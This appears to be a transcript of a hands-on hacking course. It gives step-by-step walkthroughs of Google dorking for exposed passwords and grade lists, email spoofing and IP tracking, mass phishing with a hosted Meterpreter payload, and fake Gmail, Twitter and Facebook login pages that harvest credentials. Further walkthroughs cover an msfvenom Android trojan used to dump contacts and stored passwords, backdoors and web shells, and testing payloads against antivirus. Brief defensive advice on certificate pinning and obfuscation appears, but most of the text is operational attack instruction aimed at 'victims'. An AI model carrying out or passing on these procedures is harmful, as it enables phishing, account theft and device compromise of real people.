you find one confidential document, confidential as well. So this is just a basic way to search for confidential documents, and this is, if you're targeting someone in mind, you need to dig more and to do more research. But as you can see, it's very easy to find this information here. Suppose now you want to find password, for example. Usually files or log files contain a string called your password is. Okay, so I want to search for the string your password is in a file type which is a log file. And this will return actually a couple of log files. You just can open and look into them. Let's search for password. So password, double S. So invalid password. So let's see. your password is. This is a no-go file. Let's search for another file. So here you go. Your username is, your password is. This is just an example, and see this file. Looks like a configuration file, so it's a no-go as well. So as you can see, we found that, for example, this username and password, and you can take it further. Suppose that you want to search for, usually the servers are published on the internet, for example, and some IP cameras are published. So let's go for the print server. As well, the parameter called inTitle, it will search in the title of the page, and the parameter in URL will search for the URL of the page only. So in title, let's say network print server, and file type is SHTM. You'll be able to see a couple of results. Just open that, and you have access to, this was the, yeah, exactly, these two pages here. Print servers published online. Another example, if you want to find a page with grades, for example, final grades, you can search, you can use this in URL final grades, and the site is educational site we're looking at. Reporting final grades. Let's try this again here. Final underscore grades, maybe. Yeah. Final grades, final grades, final grades.pdf. So here you go. A list of final grades plus IDs. Final grades as well. Final grades as well. So as you can see, you can tailor the search in ways you want using the advanced operators. Again, in URL, in text, file type, site. There are lots more you can use, but these are the basic ones. I'll tell you another good thing. So instead of like keeping those in mind, what I want to do in terms of searching and crafting some Google Docs URL, you can go to the Exploit DB website and go to this link here, Google Hacking Database, and you will see all of these here. You just need to search for the category. Here we go. Let's take an example. For example, vulnerable files. Let's see this. Or maybe files containing passwords. These are some of the examples here. So you just click on them. It will open the page with the detailed URL that you need to type in Google. So just press on that. It will return the results, and you can take it further from here by clicking on the result. So actually this is the way it goes. You have a list of exploits here you can use in Google search to run the attack that you want. And this is just the beginning. If you master Google search and Google advanced operators, you can have access to anything published online, such as firewalls, intrusion detection systems, video recording systems, UPS monitors, even building management systems, IP telephones, and even credit card information and CVV information. If you're using your corporate email, you've probably used the function of read receipt, but this is not available in the publicly free emails such as Hotmail, Gmail, etc. We will now use a tool that will allow you to trace your email and see when it was opened, and even see the IP address of a person that you're sending this email to. So this is part of social engineering, of course. So you want to know the location of the person, the IP of the person, because these are very important information to start an attack with. You might use this application called getnotify.com. So you go there, create an account, and you, of course, you'll have to know the victim's email. For this purpose, I've created a temporary email, this one. I'll use my email address and just write the email of the victim, and you just append .getnotify.com. I'll go to my inbox and paste it here. So it's very easy. You just append .getnotify.com and just use this as a subject and just send the email. And the email will actually be sent to the victim's inbox. Just wait for a while till it populates, Actually, the email is going to the get notify servers, and then the get notify servers are forwarding it to the victim. You just click on the subject here and it will open. Now, consequently, you will receive a report in your inbox about this incident. So you go to your inbox again, click on that, and you will see that the location of the person who opened this email is in Al Ain, United Arab Emirates. And this is the IP address of the victim, as well as the browser and operating system and the user agent and all other information. So actually, this is an important piece of information to start with if you are planning an attack. Another important thing here, if you want to spoof an email. So I'll tell you about a tool here, mki.cz, the dangerous tool, to be honest. And you can use the email of any person in this world in order to send an email on his behalf. Suppose that you want to masquerade as John Smith, and his email will be johnsmith123@hotmail.com. You can write any email here for any person you want. I will send this email to this temporary inbox here as well, and the subject will be meeting at local Starbucks. You can put anything here and just press send. Notice that the email here is johnsmith123@hotmail.com. I will go to this inbox here as well now. So email sent successfully. You just wait for a while, and here you go. Just press on that. It's coming from johnsmith123@hotmail.com. It's actually a very dangerous tool, and the recipient will not be able to verify the authenticity of the sender because the email is very obvious here. And unfortunately, not only email addresses can be spoofed, SMS messages can be spoofed, and mobile calls can be spoofed as well by spoofing the caller ID or caller number. The more information we have, the more likely we'll be able to use that against the system we want to exploit. Paterva is a South African-based company which is responsible for the development of Maltego, a GUI tool that is very useful when it comes to building relationships between entities that are found on the internet, such as people and their names, their email addresses, aliases, and group of people with companies and organization linked in a website. So it's actually a very handy tool. So let's kick in and go directly to the demo here. You can find Maltego by going to the application and social engineering tools. So at the very beginning, you have to register and to log in to the application. You can register on this app, or you can go to paterva.com and register there. It will take some time to show the screen. Here you go. So this is the default view after you sign in. We have the transforms here, which are actually tools used by Maltego to analyze the target and do a certain and specific task. So this is a transform. A graph is a graphical interface that shows the relationship between these entities. Meanwhile, a machine is used by Maltego to get the relevant information it wants. So by default, by the way, these transforms are mainly free, and the ones below are paid version. So depends on what you do. You need to buy or use the free versions. I'll install the default ones. It's very easy. Just click install and it will populate the application with the relevant transforms. Here we go. So press finish. And you can get yourself familiar with the menu here, but it's very easy. To start, press on this icon here to create a graph. On the left side, you will see the relevant entities that you can start with. The concept of Maltego is that you drag an entity to the graph and start drilling down further on it. You can start with a domain name, with a person, with a company. You have lots of entities here to start with, email address, etc. So for the sake of this demo, we will start with a domain name. So press on the domain entity and drag it to the graph here. Double click on the icon here and enter the domain name you want to inquire about. Suppose that I want to inquire about souk.com. Press OK and then right click on the icon here. You'll see a list of transforms related to DNS, domain owner details, email addresses that are found on this domain, and other files. So actually, we can get lots of information just by starting from a domain. Relevant information can be sought. To make it easy, just press Run All and see the progress bar below. Once it finishes, it will populate a very complex graph like this. But it's actually a very beneficial graph. So let's explain. Here you see the entity, it's souk.com, and it tells you the company name. These are the DNS records associated with this domain. You can double click on each and see the details. It's giving you the relationship in a top-down approach. It gives you as well some relevant websites, the MX records, the location of this domain, other relevant emails that are found on this domain. As you can see here, there are names, the name servers as well, obviously the website, the persons whose names are found on the website, some telephone numbers, some emails as well, etc. It's always interesting to see the emails and the persons. So as you can see here, Shakir Kawasmi, you can right click on this person and just run another transform to get more details. As we said earlier, I'm using the free transforms. There are other transforms that are paid, and you need to create an account on the website relevant to this transform and provide your key in order to be able to run this transform. So let's hear email address, try to get the email address of this person just by right clicking on him and running the transform. Let's go down again. So here you go, this is the email address of this person on souk.com. So actually it's a very handy tool. It will give you lots of information related to the target you want to inquire about. We will now execute a phishing attack using the same set tool. So open the terminal and run the set tool, set toolkit, then choose social engineering attacks, then mass mailer attack option number 5. What do you want to do? We want to attack mass mails, not just one single email. So select option number 2. It will ask you for the path of the file that has the list of emails. For this purpose, I've created this email list txt file here, random emails. So I will provide the path. Now it will ask you about your Gmail account or an open email relay. So I will use my Gmail account for this purpose, but you can provide any open relay for this purpose as well. This is my email account. Don't worry, I don't use it. It's not my primary email account or personal email account. And the name that will appear is email password. That's the email password. Don't flag for high priority. Do you want to attach a file? I will not attach a file because usually file attachment, like malicious file attachments, are blocked at the email control level, whatever. It's a firewall, it's email filtering system, etc. Usually these attacks don't work if you have an attachment within the email. So it's better to provide a link that has the attachment. Once you click on the link, you'll be able to download the attachment. So I will not put inline email subject, salaries for example. Send the email, I'll send it in plain form, not HTML. And now it will ask me about the body. In the body, I will put a link to a malicious file, which I will be hosting on my machine here. For this purpose, I will open another terminal and I will run the set toolkit again. I will select social engineering, but this time I will create a payload and a listener, option number 4. So I will create this payload, generate it, host it on my web server, and put the link in the email address. I will do option number 2 here, create a reverse TCP meterpreter. The host will be the local IP of my computer here. The listener, just generic number 4444. Now it's generating the payload on my machine. It will take some time. Generating payload. So the payload has been generated under this path. Okay, so I'll copy this path and it's asking me if I want to start a listener. Yes, let's start a listener. It will initiate Metasploit console session and a listener will be invoked. Meanwhile, I will open a new terminal and copy the file exe here to the web root directory. So I will copy the file from the path to var www.html. So now the file is here. It's payload.exe. And how can I reach it? It's the ip/payload.exe. Again, I can go to a bit.ly.com and put my IP here. And I ask it to shorten it. So I'll copy that, go again here to the first instance and put this in the body. I'll press enter and then END to end. Now the application will attempt to send the emails to all the list that we have in this text file. If I go to the victim machine here and check this email, I'm using tempmail.org. I have got a new email. I'll press on it, and this is the link of this is a crafted link actually of the malicious file hosted on my server. I press on it, I'll save the file, save as, whatever, you just name it, put it on the desktop, or you can just even run it directly from here. So let's run it. If I go here again to my Meterpreter session, it will tell me that a Meterpreter session has been opened, and now I have full access to the remote computer. Now we'll see how to hack into Facebook, Twitter, and Gmail accounts. There's an application that comes with Kali under the social engineering tools called SET, which is the social engineering toolkit. You can press the icon from here to run it, or open the terminal and write set toolkit. You will be prompted with a menu of 6 items. We are interested in social engineering attacks. Press 1. Then it will prompt you another menu with 11 different social engineering techniques or methods to execute. In this tutorial, we're interested to execute website attack vectors. So press on 2, then select credential harvester attack method, number 3. Here, you will be able to select web templates that already exist within the SET tool, or you will be able to tell the tool to clone a website, or you reference the tool to a custom import directory in order to import the website. In this tutorial, we'll choose one, which is the existing web templates in the SET tool. IP address for the postback is the local IP address we're using here, 192.168.211.132. Just to make sure, ifconfig, and this is my IP address. Press enter, then it will tell you which template you want to use. First of all, let's use the Google template. So template number 2, and it has created the file or the website under these directories. So it's actually created a fake Gmail website, so that we'll use in order to harvest the credentials from the users. Just press enter. You want to attempt to disable Apache. Seems Apache is running and this website wants to run, so press yes. Harvester is ready. Have victim browser for your site. So actually my IP address now is hosting a fake Gmail website. How to test that? I need to go to a browser on my Windows machine and type the IP address of the Kali machine, and here you go, it has Google page. So for example, press any email, type any email and any password, okay, and then sign in. Observe the behavior here. It will direct you to the Google page, and if I go to my machine here, I'll be able to capture the credentials. This is the email I used, and this is the password that I used. Simple, huh? So similarly, you can generate a report as well, etc. We'll do the same thing for the Twitter. Select the Twitter template, press return, and let's go to the website here again. 192.168.211.132, and here you go, you have a Twitter sign in. Again, just try to use any email and any password, press sign in. It will capture the credentials and redirect you to the Twitter homepage. The normal user will not notice this kind of behavior. Again, if you go to the machine, you'll be able to capture the credentials here. So this is regarding the attacks for Gmail and Twitter. Let's see how Facebook works. So in the Facebook example, we'll select site cloner. So select 2 and then use the localhost IP and then enter the site that you want to clone. In this case, it's Facebook. In this case, it's https login.facebook.com. It says that the files have been copied and it's running on port 80. So let's go here again and use the same IP. So here it seems some cross-site scripting. Just press Ctrl F5. Sorry, some CSS and JavaScript issues. Press Ctrl F5, and here we go. Just put any email and put any password. Press login. Again, the same behavior. It will take you to the legitimate Facebook page. And if you go here, you'll see, where's that? The credentials that we use now are captured. Quite easy, huh? Now, if you go to, sometimes it's not easy to share this link, 2.168.211.132. So this link is actually, we're still working in our lab, in our internal network, but once you publish this, and we'll see going forward in the videos how to publish this on the internet, it is not advisable to send such a link here. So you can go to the site bit.ly.com and just put your public link here. What's that? Just copy this address of your and copy it exactly, so it will give you this short link here. You can send it through email to anyone, and once he presses on that, he will be redirected to the webpage hosted on your server. So now we learned how to spoof Facebook, Twitter, Gmail pages, and how to harvest the accounts. Now, if you can link it to some of the techniques we studied earlier, such as DNS poisoning, ARP poisoning, you will be able to link the chains and come up with a scenario, which is a real-world scenario on how to combine social engineering with network attack techniques. Nowadays, mobile devices dominate the consumer use and habits from a personal and enterprise perspective. Thus, they are ubiquitous, they are found everywhere. The basic risk segments can be divided into these 5 main mobile application security categories, starting from the mobile device itself, passing through network security, web server security, database security, and application management procedures. The mobile device risk spectrum starts with the data storage. Is the data on the mobile device encrypted or not? About data transmission, we can talk HTTPS versus HTTP, FTPS versus secure FTP. So is the application utilizing secure protocol versus open protocols? Reverse engineering is a very important area when we talk about mobile applications. Are there binary protections in place? If there are no binary protections in place, anyone can have access to this mobile app and just reverse engineer it and get the source code and get to know the details of the architecture of the mobile app and more. Application access management. When you install an application, you grant it access to local resources. So is the application having access to only the resources it needs, or it's having more elevated access? The other mobile attack surface is the network threat itself. Here we mainly talk about HTTP versus HTTPS, using SSL, using TLS, because if we do that, it will cover all the wireless connectivity issues. You will disallow any hackers from doing session hijacking and DNS spoofing. Thus, we need to know how these technologies work. Doesn't mean that if you use SSL, you're safe. No, we will see in the examples coming forward that we can decrypt SSL as if we are not using SSL in the first place. So we need to know how to use and utilize SSL within our mobile applications. The other security spectrum is the web server security. Do we have any processes in place to identify and apply critical system security patches? Do we have a process in place to assign roles and responsibilities for people who will take the ownership of their actions performed on the web server? And do we use processes to mitigate DDoS attacks such as CAPTCHA, or do we have password policies in place to lock out attacks and to lock out accounts that have been attempting to brute force using incorrect passwords? These are trivial threats, not only related to the mobile attack surface, but however, it's important to mention them here. The other attack surface is the database threats. Who has access to our database? Who can use privileged account? Are we sanitizing the data we're getting from mobile applications before we insert it into our databases? Are we checking the logic of the data we're getting from mobile apps? Are we utilizing the latest updates to patch our database? And are we validating the data and sanitizing? The last mobile attack service is the application management threats. As you know, many enterprise mobile apps are distributed using application management software. Thus, who have access to this application management software, who can deploy our source code to the online stores such as Google Play or Apple Store? Is our mobile app signed by the enterprise account? And who can or who has the ability to do remote wiping, either fully for the mobile devices or partially only for the organizational data? Before getting hands-on with SSL decryption example, let us see how HTTPS traffic works. First of all, the application, web browser, or a mobile application will request a secure page from the server. The server will receive this request and will send its public key along with the certificate. Now, the web browser or the application will have to do a couple of important steps. First, it needs to make sure that the certificate it received is not expired, it is not revoked, and it is issued by a trusted party, and it's not like a generic self-signed certificate. And on top of that, it needs to ensure that the common name in the certificate matches the name of the website it is connecting to. So after that, the browser will create a symmetric key and sends it to the server by encrypting it with the public key it received in step 2. Now the server will receive this message and will decrypt it using its private key, of course. Now the mobile application, the web browser, and the web server, they have a common symmetric key. The web server will encrypt its messages, its pages, information that will send to the client using this symmetric key, and the client will decrypt this information using as well the symmetric key. Taking into consideration what I just mentioned, we will take an example of a mobile application connecting to a server. Now, looking for vulnerabilities in a mobile application represents multiple challenges, one of which is the ability to intercept and maybe edit the encrypted communication between the mobile device and the server it's talking to. Knowing the content of the communication is very important when we're looking for possible leaks of information and maybe sensitive information. Now, we will see in the example coming that or how to set up a proxy server that will allow us to analyze the communication taking place between the mobile application and the server. So usually this is a trivial man-in-the-middle attack. We redirect the traffic going from the mobile application to a proxy server. For that, we need to install the certificate issued by the proxy server, which is a self-generated or self-signed certificate. The certificate needs to be installed on the mobile application. So now we're trusting the communication with the proxy on our mobile, and we will be able to use SSL here and decrypt the communication since we have the public key and the private key. So now we have two channels, one between the mobile and the proxy and the other between the proxy and the server. The channel between the mobile and the proxy is using our fake or self-generated certificate, and we will be able to look into this channel because we have the public key and the private key, and the other channel is actually between the proxy server and this original server, which is using actually the original certificate provided by the server itself. On our mobile application, as we said, we need to change the proxy settings to refer to the IP and the port number of the proxy we have just set up. It is good to mention that we will be using a proxy server called Charles for this demo, but you can use any proxy servers available out there because the concept is the same. You can use Burp, you can use Fiddler, you can use man-in-the-middle proxy. On top of that, you can as well download applications, especially on Android devices, that mimic this whole setup. It will be easier for you to just download an application which will install a certificate on the mobile application, and you will be able to monitor or capture the traffic and analyze it. You can use SSH Droid or Proxy Droid usually, and many other applications on the Google Store out there. So let's go directly and see how we will actually demo the SSL decryption. To start with, you need to go to charlesproxy.com and install the proxy from there. After that, you open the application and you will be presented by this interface. Now we need to go to our mobile device and route all the traffic from this mobile through the proxy. For that, you go to the Wi-Fi connection that you're currently connected to, and then you go to configure proxy. You select manual, and then you use the server and the port, which is Charles running on. To do that, you go to the help menu, SSL proxying, then install Charles root certificate on a mobile device, and it will tell you its IP and the port number that it's actually running on. So now we use this information to configure our mobile to pass all the traffic through the proxy. Now I'll go to browser here on the mobile, and if you noticed, it told you that then browse to this URL here to download and install the certificate. So it generated a self-signed certificate which we need to install on our mobile device. To do that, we open the browser and go to charles.pro/SSL, and it will prompt us to install this profile or certificate. You just press install, again install, and done. Now we have installed the certificate. Now if you go to proxy, SSL proxy settings, and this should be disabled by default. So let's now work without enabling SSL proxy. Okay, I'll just open a generic mobile app from my mobile device and try to log in using these generic username and password. Fine, so just press login, and notice here on the left side, Charles highlighted this event that is taking place here. So if you press on that, you go here to tell you that SSL proxying is not enabled. Then you go to content and see that it is a scrambled content since the connection to the server is encrypted and we're not able to see any of this traffic. So to do that, or to be able to see or check the tunnel, you go to proxy, SSL proxy test settings, then enable SSL proxying, keeping in mind that we've already installed the certificate on our mobile, and you just press OK again. I will go again to my mobile application and try to, let me clear this session here now, and from the mobile application I'll just log in again. Okay, you will see that activity here, and now you'll see that some file structure is being populated under this URL here. If you go here to this file, go to content, you will be able to see the username and password that we used along with other information. The information on the top is the request, and the information at the bottom is the response we got from the server. Since this is unauthenticated response, this is what we got from the server. From the sequence here, you will be able to see all the connections that are being passed through this proxy and the result. So this is actually a successful attempt. We got some cookie information, API URL information, although the attempt to sign in was not successful. But using that, we were able to get some information. Go again to this mobile. Try to sign in with my username and password. So let me hide this now here and use my username and password to authenticate to this application. Keep in mind that we're doing this just to test our application if it's really secure over there on the internet. So I'll press now login, and just notice I'll just create a new session here. I'll press login, and you just notice the activities that are taking place under this URL. So I will not press here because you'll see my username and password, but actually it generated lots of information, authorization codes, profile related information, cookies, some internal hierarchy on the server. So the more you navigate through the app, the more information you will be able to get. See, I'm now pressing around this application, and it's just popping up all the information that is passing through the proxy. Now, as we said earlier, we have two connections now from our mobile app to the proxy, which is kindly HTTP now because we're able to decrypt it using our keys that we know, and the other connection is from the proxy to the server itself. So here we go, lots of information. Just you can see all the responses in JSON format. Let me see what else we can see here. So the most important thing is that if this proxy is on, for example, hotspot, and users are authenticating through it, they will be able to see all this information. I just want to show you this important information here. Under the cookies, this is the information that we're able to get. Under the text form, you will see this URL with the device token, username and password to authenticate. Under the form, this is the information, and under the row format as well, similar kind of information. So an attacker can use this to generate another attack. So this is an important piece of information that an attacker can get to perform another attack. So the recommendation here is to encrypt this information at the application level, at the code level. So don't depend on the SSL or the encrypted tunnel. No, you have to take these security measures at the level of the application itself while writing the code. Going back to this slide, it's obvious that the mobile application didn't perform some of these steps correctly. Actually, the mobile application isn't checking that the certificate is issued by a trusted authority. It just accepted our self-signed certificate. And unfortunately, mobile application writers often ignore the need to check certificates and they blindly accept any SSL certificate without understanding how SSL works. To protect against that, you need to use certificate pinning. Actually, when you're doing that, you're checking if the certificate name matches the web server name that you are connected to. And once you do that, you will automatically reject any other certificate. Speaking about reverse engineering, one can say that Android applications can be easily decompiled using lots of available tools. This opens the door for many forms of abuse such as intellectual property theft, data leakage and data theft, credentials harvesting, and on top of that, you can clone the application, tamper it, and then publish it online again so that people can use it. First of all, we need the .apk file. Usually you install applications on your mobile phone, but you can extract the APK using lots of available applications such as this APK extractor. So download this APK extractor and open the application. It will automatically load all the applications that are installed on your mobile phone. You can just browse, and with just a click of a button, you can select an application that you want to extract to .apk and then convert it. For example, this barcode scanner, you can just press on it and it will extract the files to the local storage. If you go to the local storage, you will be able to see these extracted APKs under the extracted APKs folder. So I have extracted a couple of files for the purpose of moving them to my Kali machine. Now I've moved the APK files from my mobile to the Kali machine under the extracted APKs directory. Now let's try to decode the whatsapp.apk file. For this purpose, I will use the APK tool available with Kali, which actually decodes resources from the original file and rebuilds them after making some changes. You can use the D parameter to decode and the B to build. So let's try the WhatsApp thing, -f -r whatsapp.apk, and it has started. So let's go directly to the directory here and see the resultant file and folder. Okay, and it's over. As you can see, it has organized the extracted files similarly like an Android project, where you have the assets, you have the resources, and you have the code. The assets usually are files that are not compiled within the source files of the project. Meanwhile, resources are compiled within the code of within the Android code. And here you can find the Java code itself. Let's drill down into the assets. Here you can see strings compilation, some drop down lists. I think, what's that? Let's go there. Yes, some list of values, the fonts that are being used. You can see as well the graphics here used within the WhatsApp application, emojis, and if you go directly to the code, the extension is SMALI. This is how it's set in the APK tool, and here you will be able to see all the Java code which is extracted from the WhatsApp application. You can do this to your own application just to make sure that the extracted files, they don't contain any sensitive or confidential information. Let's select any file here and open it just to show you the Java code. Lots of files. So this is just an example. For your own application, just try to make sure that it doesn't have any important information that might fall into the hands of hackers. Suppose that you did some changes to this application, whatsapp.apk. Now we want to build these files into a new APK file. For this purpose, you can use APK tool again, B for build, and select the file, the directory name exactly. It is WhatsApp uppercase, and then use the O parameter, call it my whatsapp.apk, and now we're building it again. And let's go here to see the result. It will take some time, but at the end it will create the new APK file. And here we go. This is my new version of the WhatsApp called mywhatsapp.apk. Can we prevent hackers from decompiling our applications? Well, generally speaking, we can make their life harder. And the harder we make it, the fewer will remain. But actually, it takes a lot of time and effort to make our code difficult to crack, but we can't make it impossible to crack. So here are some of the tips that we can use in order to make the life of the hacker difficult. We can use code obfuscation. This is the usual word that is used. Actually, it means we can mystify our code or we can complicate our code. We can use a couple of applications such as ProGuard and DexGuard. These applications actually does a good job and can make reverse engineering difficult. It can encrypt strings and detect code tampering. ProGuard is an open source application, while DexGuard is a commercial and paid application, and it does the job actually better than the ProGuard. You can as well use NDK, which is the native development kit for Android, to write libraries in C, and then you can import them to your Java code, which actually makes it difficult to decompile. So regardless of the code complication that you do, always try to encrypt and sign messages and make sure that messages cannot be repeated. So use some timing or some kind of sequence to assure the integrity of the communication between the application and the server, and always authenticate your client. In this video, we'll see how to attack an Android mobile phone from Kali. For this purpose, I have installed an Android virtual machine on my computer here. You can easily go to osboxes.org, then VM images, VirtualBox images, and install the latest Android virtual machine. You need to have VirtualBox installed. You just have to import the virtual machine you've downloaded, and you'll end up with something similar to this environment here on the screen. From the Kali perspective, we will actually create a malicious APK file, malicious Android application file, and we will send it to the end user, which is the victim in this case. And once the victim installs and opens this application, it will create a connection between this mobile phone and our. So for this purpose, we will use a command called msfvenom, which is actually a combination between the msf payload command and msf encode command. And we will create a payload under Android Meterpreter reverse TCP. Now we will specify the IP of our server here. It's 211.142 and a local port as well. Now we will export this to root desktop, and we will call it for this purpose, for this tutorial, trojan.apk. Of course, in a real world scenario, you can call it any fancy name that invites the user to open up and install the application. You can see here that it's in the process of creating this APK file, and here you go. Now you just need to move this file from your Kali machine to the end user. You can do that using various techniques such as social engineering. For this purpose, I've just copied the file from this machine to my phone here, and you can see it under the download section. That's it, trojan.apk. On the other hand, now we need to create a listener on our server that will listen to this incoming connection. After you launch Armitage, just go here and write Android. Now go to the payload section and double click on reverse TCP. You will see that the IP is automatically populated. Now we only need to match this local port here with the port that we've used when we've created the APK file. Just press on launch and Armitage will start the handler locally, and now it's waiting for connections on this port. I will go now to my Android device here, and go to the download application. Actually, I've moved my application from Kali to the Android file here, and you only need to install it, just the usual stuff. So just notice here when I press on open, now on my Kali machine, the Meterpreter session is opened and it shows me here an Android or a Linux based device has been compromised. Now I have full access to the remote Android phone. It's well noting, and it's worth noting that we're doing this in a lab here, but actually you can use it over the internet using your real IP and port forwarding. So just right click on this compromised machine and you can actually interact here using a Meterpreter shell. Just type help and you'll see all the commands that you can invoke. You can as well explore and browse the files that exist on this phone. Just write this / and you'll have access to the root, and you can check out all the files here. Let's see if we can do something here. I just go to the SD card and I can spot here a password file. Just double click on that, or no, let's do that again. A storage file here, SD card. I can right click on that and press on view, and I'm able to see personal Hotmail passwords, Gmail, work account, and some credit card pins. If I go again to the Meterpreter session, as I did earlier with the type of the help, you can invoke a couple of commands. Such an interesting command will be dump contacts. It will search for the contacts on the phone and it will dump them locally on a file. So it found like 787 contacts and it listed them here. So let's go check out this file, update my database, and I'll try to locate this file. Here you go. Now I'll open that using LeafPad, and here you go. Lots of accounts with phone numbers, emails, etc. Going back to Armitage again, another interesting command would be dump SMS. But since this is a virtual machine, there are no SMS found. But if you're doing a real world attack, you will be able to get all the SMSs as well as webcam snaps using this command. Of course, this virtual machine doesn't have webcam. And you can as well search for files. Like I want to search, let's do star.star here. This is some of the results. If I do like star.txt or maybe star.doc, nothing here. So actually, the point I'm trying to make here is that now you have full access to this mobile phone and you can do whatever you want. Exploiting a computer as we did earlier is something awesome, but the goal of most penetration tests is to maintain access to the compromised system. There are a number of methodologies for maintaining access to the exploited victim. However, the conclusion of each of these methodologies is to reduce the time consumed and the efforts required to keep attacking the same machine over and over after it has been exploited. Maintaining access is a form of art that involves just as much, if not more, thought than exploiting the system. Below are some terminologies, but however, they are not just definitions. They are in deep relation and they will give you introduction on how to maintain access to system after exploiting. So what is malware? Malware is a general term used for viruses, worms, trojans, keyloggers, bots, etc. And actually, it's a good thing to use when you're doing your penetration testing report to an executive level. But when you are doing your penetration testing report at the technical level, it's better to define which is worm, Trojan, viruses, etc. A backdoor is a program that is left running on the compromised system to facilitate later entry without having to exploit the vulnerability over and over again. Trojan horse, or simply Trojan, is a malicious program that is installed onto the host to perform desired function. So you install it thinking that it will do like function ABC, but actually it will do function XYZ. So it conceals and hides its intentions. Virus is a malicious code that infects a file. It needs to be invoked by a human, so you need to click or double click on the file to invoke it, and this virus will just infect the file, and the virus cannot be moved on its own from one machine to another, compared to the worm, which has the same destructive force as the virus, but they do not need the human interaction to replicate from one target to another. They just replicate on its own. From our perspective, penetration testers, we can use viruses for the sake of compromising the system, but it's better not to use worm because, as you can see, the nature is not controllable of the worm. A keylogger is a system or a code that captures the keystrokes from a user and feeds that back to us. It's as an essential tool for penetration testers, in which we use routinely. Botnet is short, or bots are short for robots, which are sometimes called zombies, and it's a network of compromised systems that are controlled by a single computer, which is called the bot master. And these systems are infected by viruses, trojans, backdoors, etc. And they are usually used to perform attacks such as DOS attacks, maybe of course as well spam services, etc. So the idea here is that a single computer controls a bunch of computers. This single computer, which is called the bot master, can as well control another masters in the same network if it is compromised of thousands of machines. Adware/spyware is supposed to be a program that is designed to display advertisements on your computer or even your phone. You see these pop-ups going here and there, you cannot close them, so they are controlled by an adware software, which makes its developer gain money through pay-per-click or pay-per-view, and it actually irritates users. So once this adware collects information and monitors your activities without your consent, it is named as spyware. A backdoor is a malware type that negates normal authentication procedures to access a system. As a result, remote access is granted to various resources within an operating system, within an application, within a database, within a file server, etc., thus giving perpetrator the ability to remotely issue commands and even update the malware itself. Backdoor installation is achieved by taking advantage of vulnerable components available on the remote system. The detection of these backdoors is most of the times difficult. Web server backdoors are used for a number of malicious activities such as data theft, server hijacking, website defacing, even launching of distributed denial of service attack, also infecting the website's visitor, and as well for advanced persistent threat assaults. The most prevalent backdoor installation method is RFI or remote file inclusion, such as an attacker can exploit a vulnerability within an application that dynamically references external scripts. In an RFI scenario, the referencing function is tricked into downloading a backdoor Trojan from a remote host. Some of the websites as well, they offer the function of uploading files such as your personal CV, any kind of file, and they don't take into consideration blocking PHP or malicious files. So you can easily use that feature to upload your backdoor there on the website. So typically, perpetrators identify these targets using scanners that can locate websites having unpatched or outdated components that can enable such remote file inclusion. Referring to our list here, we have different backdoor tools such as Powersploit, which is a tool for Windows machine mainly, and it can be installed on the victim's machine in where this tool will help the attacker to connect to the victim's machine through PowerShell. SBD and CryptCat are tools that are similar to the famous Netcat. They are portable and can be easily installed on the victim's machine, whether it's Linux-based or Microsoft machine. They help connect to victim's machine remotely anytime by using a specific port in order to send remote commands. The main difference between SBD and CryptCat is that CryptCat can allow you to have TCP and UDP encrypted connections. Web shells can be used to maintain access or even hack a website. Most of them are detected by antivirus, and the famous ones are C99 and C100 shells. Weavely is a PHP web shell that enables remote connection. It's a very powerful tool that can be used as a stealth backdoor, and it can be used as well to legitimately manage websites. HTTP Tunnel is a tool that creates bidirectional data stream tunneled into HTTP requests, and the requests can be sent to an HTTP proxy if desired. DNS to TCP is a tunneling tool that helps pass TCP traffic through DNS traffic, meaning on port 53. This is another important tool because most of the times this port 53 is used to legitimately identify services on the network, and thus it's most of the time open. If you know the antivirus application that is running on the potential target system, you might want to test your backdoor or Trojan horse on VirusTotal.com. This website will give you the detectability of common antivirus application vendors against a file that you upload. This will help you execute a successful attack. In simple terms, Netcat is a computer utility for reading from and writing to network connections using TCP or UDP. When we say reading from and writing to a network, it means that the utility runs in two modes: the client mode and the server mode. Netcat is a small tool, but actually it's a very powerful one, especially used in forensics, as you can redirect the file output on the local machine to the forensics workstation you are working on. We use Netcat to scan and connect to an arbitrary port, to create a listener on a local port, to transfer files, and for remote administration. We will see examples on how to bind the shell and how to bind a reversed shell. The syntax for using Netcat is NC, then the flag options, then the target IP address, then the port, and the parameters are L for listen mode, E in order to execute a program after the connection is established, N that we tell the program not to perform DNS lookups, V for verbose, which shows us some status of the connection, if there are any errors, if the connection is established, etc. So at the console we will be able to see some information, and P for the local port. Netcat usually comes installed on Kali Linux, but it is not installed by default on Windows machines. So you can go to any of these links and download the compiled version of Windows and start using it. In our 3 examples or 4 examples, we will use this structure here. The Kali that we are using is a local version which has a private IP address. It lies before a public IP address or before a firewall or router in this case, and we will connect remotely to a Windows machine that is hosted on the cloud having a public IP address. Windows machine can as well be the Windows machine that we downloaded earlier on VMware, but for the sake of giving a real example, we will use this scenario. In the first scenario, we will connect to a port on a remote machine. So actually we will scan the port and see if this port is open and connect to the port. What we will do is to open a terminal on our Kali machine and write the command nc for netcat, then parameters, nv for verbose. Then we will put the IP address of the cloud Windows machine, which is 173.248.132.230. I know that one of the ports on this machine, which is 8010, is open. So let's see. This is the output of NC. It tells us that it connected to this IP address on port 8010 and this port is open. So this tells us lots of things. First of all, it tells us that we were able to manage to have a conversation with this cloud server, and it tells us that port 8010 is open. The next example, we will bind a port and listen to incoming connections. So here we will go to the Windows server. This is actually the netcat files that I have downloaded from the internet. These are compiled for Windows, so we just put them in the folder and navigate to the folder on the desktop. Here you issue the command of nc -nlvp, and then let's select the port of 2222. So what are we actually doing here? So we are issuing the command of netcat, and we are passing the parameters of n, as we said, don't perform DNS lookup, l for listening. What's happening here is that netcat is listening to the port 2222 in a verbose mode, which is show me any information about the connection. So we just hit enter, okay? And now we see that it is listening to any connection that is coming to port 22. So now we go to our machine, Kali machine, and from here we will connect remotely to the cloud server or cloud Windows machine and try to open a conversation with this server. So we'll issue the command nc -nv, then the IP address 173.248.132.230, and then we'll specify the port and press enter. So it will tell me that this port is now open. So actually now there's a tunnel between these two computers, the Kali, which is private on the private network, and the server, the Windows server, which is on the internet. So what can we do now? Actually, we can open a chat session, for example. So let's say hello from Kali, and we press enter. Now if you go to the Windows machine, you'll see this message popped up here, and from the Windows machine I can as well reply hello from Windows machine. If I go to the Kali, I'll see that the message has been popped up here as well. This is a simple demonstration, and I think it's not that useful, I mean, to chat between two servers, but it actually demonstrates the lots of capabilities of the netcat utility. The third example we'll show is to set up a listener and redirect any incoming input to a file. So actually we're transferring files from one computer to another. For this purpose, I'll go to my Windows machine. If I need to exit this, I press Ctrl C. And from this terminal here, I will issue the command of nc -nlvp, then on the port. And then I say that anything coming on 